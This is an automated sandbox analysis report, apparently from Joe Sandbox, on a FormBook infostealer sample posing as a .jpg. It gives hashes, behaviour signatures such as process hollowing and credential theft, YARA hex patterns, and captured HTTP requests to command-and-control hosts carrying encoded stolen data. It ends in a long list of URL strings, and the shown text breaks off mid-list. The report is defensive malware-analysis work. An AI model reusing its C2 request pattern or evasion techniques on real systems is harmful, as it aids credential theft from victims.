
Analysis Report qkuriw.jpg

Overview

General Information

Sample Name: qkuriw.jpg (renamed file extension from jpg to exe)
Analysis ID: 255298
MD5: 7af33570ec886974f5513b46e999b988
SHA1: 6b9e35f3131fdc4bd8ea66cd44303cb1004b2019
SHA256: da4647425789cc5a32d2719815367c8c21d2279a77a3179e609e1db9844ef15a

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected FormBook malware
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • qkuriw.exe (PID: 6804 cmdline: 'C:\Users\user\Desktop\qkuriw.exe' MD5: 7AF33570EC886974F5513B46E999B988)
    • explorer.exe (PID: 3420 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • mstsc.exe (PID: 7044 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author
qkuriw.exe | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
qkuriw.exe | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x98f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15805:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x152f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15907:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x15a7f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa6fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1456c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb3f3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b577:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c58a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
qkuriw.exe | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  Strings:
  • 0x184e9:$sqlite3step: 68 34 1C 7B E1
  • 0x185fc:$sqlite3step: 68 34 1C 7B E1
  • 0x18518:$sqlite3text: 68 38 2A 90 C5
  • 0x1863d:$sqlite3text: 68 38 2A 90 C5
  • 0x1852b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18653:$sqlite3blob: 68 53 D8 7F 8C

Memory Dumps

Source | Rule | Description | Author
00000000.00000002.1325323347.0000000001221000.00000020.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.1325323347.0000000001221000.00000020.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x88f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14805:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x142f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14907:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14a7f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x96fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1356c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa3f3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a577:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b58a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.1325323347.0000000001221000.00000020.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  Strings:
  • 0x174e9:$sqlite3step: 68 34 1C 7B E1
  • 0x175fc:$sqlite3step: 68 34 1C 7B E1
  • 0x17518:$sqlite3text: 68 38 2A 90 C5
  • 0x1763d:$sqlite3text: 68 38 2A 90 C5
  • 0x1752b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17653:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.1542898983.0000000003050000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000002.1542898983.0000000003050000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x98f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15805:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x152f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15907:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x15a7f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa6fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1456c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb3f3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b577:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c58a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author
0.2.qkuriw.exe.1220000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.qkuriw.exe.1220000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x8af8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14a05:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x144f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14b07:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14c7f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x98fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1376c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa5f3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b78a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.qkuriw.exe.1220000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  Strings:
  • 0x176e9:$sqlite3step: 68 34 1C 7B E1
  • 0x177fc:$sqlite3step: 68 34 1C 7B E1
  • 0x17718:$sqlite3text: 68 38 2A 90 C5
  • 0x1783d:$sqlite3text: 68 38 2A 90 C5
  • 0x1772b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17853:$sqlite3blob: 68 53 D8 7F 8C
0.0.qkuriw.exe.1220000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.0.qkuriw.exe.1220000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x8af8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14a05:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x144f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14b07:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14c7f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x98fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1376c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa5f3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b78a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Yara detected FormBook
Source: Yara match, file source: qkuriw.exe, type: SAMPLE
Source: Yara match, file source: 00000000.00000002.1325323347.0000000001221000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000004.00000002.1542898983.0000000003050000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000004.00000002.1543067846.0000000003291000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000000.1277150451.0000000001221000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.1325998412.0000000001560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.1325803353.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000004.00000002.1543143849.0000000003470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000004.00000002.1543182112.00000000034A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 0.2.qkuriw.exe.1220000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.0.qkuriw.exe.1220000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: qkuriw.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\qkuriw.exe, code function: 4x nop then pop ebx 0_2_01227AFA
Source: C:\Windows\SysWOW64\mstsc.exe, code function: 4x nop then pop ebx 4_2_03057AFC
Source: C:\Windows\SysWOW64\mstsc.exe, code function: 4x nop then pop edi 4_2_03066DEB

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49742
Source: global traffic, HTTP traffic detected:
  GET /aq3x/?rDHpw=xt9dcFt0dhip1fI&0L3HBdm=VigcpkHhs8n5DOV6yBCquYusmErcVSfEvB4fvkc+Oh3i26igEimj/0FcA/sd+n3eZmOl HTTP/1.1
  Host: www.atlhomebuilders.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic, HTTP traffic detected:
  GET /aq3x/?0L3HBdm=SDLUZt00bibBYHuxY27Atwtg05TijM6qYQEqOnpyWohw9o7PXYLNmPyXYnCYkq9YIHmM&rDHpw=xt9dcFt0dhip1fI HTTP/1.1
  Host: www.regulars6.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic, HTTP traffic detected:
  POST /aq3x/ HTTP/1.1
  Host: www.atlhomebuilders.com
  Connection: close
  Content-Length: 413
  Cache-Control: no-cache
  Origin: http://www.atlhomebuilders.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.atlhomebuilders.com/aq3x/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Ascii: 0L3HBdm=dAsm3DP1gNKLbvMqihDy~OGYt2DSaQTY9WJ3qTIDGgnfwY36STW6xhkGa_MBsXrVJWCPhlG3nzeOjOizxghm4jNHxf61SYJS1-GHqkB2N9PiDXErRvYZVTZt818JWmH3PkhL516dmTIjo2tdUSSMmiIB(yhUn9OpOckmIVwCWF2WNrv3C7S6AmMqA_FYOiKetGZjBvPjXAiDxkQfsvAzQgAR6HdCPJva0Zfb1Sdg(5p0(PtjGzxC12cP4aE0(mRzRQ0Knmp_vXiPw_B46dMR6Zr-3iznMdp_mg(uLSQAUD8uKSwK7cJA2h05cdsDB180Tqsszecxsb8NcOdYGgtAAjoPq2asHY(5ODAIk5Zzq0J0xfX6z7H9rla5FQV_Xssy2axGrbToC8BrCA9kBg).
Source: global traffic, HTTP traffic detected:
  POST /aq3x/ HTTP/1.1
  Host: www.atlhomebuilders.com
  Connection: close
  Content-Length: 184777
  Cache-Control: no-cache
  Origin: http://www.atlhomebuilders.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.atlhomebuilders.com/aq3x/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
Source: global traffic, HTTP traffic detected:
  POST /aq3x/ HTTP/1.1
  Host: www.regulars6.com
  Connection: close
  Content-Length: 413
  Cache-Control: no-cache
  Origin: http://www.regulars6.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.regulars6.com/aq3x/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Ascii: 0L3HBdm=ahHuHKZEbjXOM1a7MDe61GRhxLPMj8iaKVtPKVJqXLg2v4b8Z42v0Y3IM0qcx_NNeiOh7fDcr3rfy7FSGAqjCH7t5Zq2Ndf4HbCcfsGqenyD9PxYx4m1G_u-IOqV1EVLDVfhD6xkRgYhVv(kfNtAmXqluPrFPo2F6u6XXK6sCjFNCBhqUTtc0FhhR2BinYViZpTGbd5xdyp4Ar16QLZu0DicGXdn16DkeFYjdTnL(GQ51aCqsnSfDXOQ(8evBuKNM3GrGIG15XpKxQTvvMz-PV~SAEHnCf3kVD9M0wH_IaFCggPF(zmzQvzEoZwc43szSrIw3ABezZXGB6ZmtF3JKiixbtMPqIM4mtlasaRXKlA1M54VU3RxqJKvlgiBqXAq2HdIu7tIfUTyTI2M7Q).GrbToC8
Source: global traffic, HTTP traffic detected:
  POST /aq3x/ HTTP/1.1
  Host: www.regulars6.com
  Connection: close
  Content-Length: 184777
  Cache-Control: no-cache
  Origin: http://www.regulars6.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.regulars6.com/aq3x/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: unknown, DNS traffic detected: queries for: g.msn.com
Source: unknown, HTTP traffic detected:
  POST /aq3x/ HTTP/1.1
  Host: www.atlhomebuilders.com
  Connection: close
  Content-Length: 413
  Cache-Control: no-cache
  Origin: http://www.atlhomebuilders.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.atlhomebuilders.com/aq3x/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Ascii: 0L3HBdm=dAsm3DP1gNKLbvMqihDy~OGYt2DSaQTY9WJ3qTIDGgnfwY36STW6xhkGa_MBsXrVJWCPhlG3nzeOjOizxghm4jNHxf61SYJS1-GHqkB2N9PiDXErRvYZVTZt818JWmH3PkhL516dmTIjo2tdUSSMmiIB(yhUn9OpOckmIVwCWF2WNrv3C7S6AmMqA_FYOiKetGZjBvPjXAiDxkQfsvAzQgAR6HdCPJva0Zfb1Sdg(5p0(PtjGzxC12cP4aE0(mRzRQ0Knmp_vXiPw_B46dMR6Zr-3iznMdp_mg(uLSQAUD8uKSwK7cJA2h05cdsDB180Tqsszecxsb8NcOdYGgtAAjoPq2asHY(5ODAIk5Zzq0J0xfX6z7H9rla5FQV_Xssy2axGrbToC8BrCA9kBg).
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Fri, 31 Jul 2020 19:29:22 GMT
  Server: Apache/2.4.29 (Ubuntu)
  Content-Length: 328
  Connection: close
  Content-Type: text/html; charset=utf-8
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /aq3x/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: explorer.exe, 00000001.00000000.1302140897.0000000012B70000.00000002.00000001.sdmp, string found in binary or memory: http://%s.com
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000001.00000000.1302140897.0000000012B70000.00000002.00000001.sdmp, string found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000001.00000000.1294009736.0000000007EC1000.00000004.00000001.sdmp, string found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp, string found in binary or memory: http://esearch.rakuten.co.jp/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
            Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
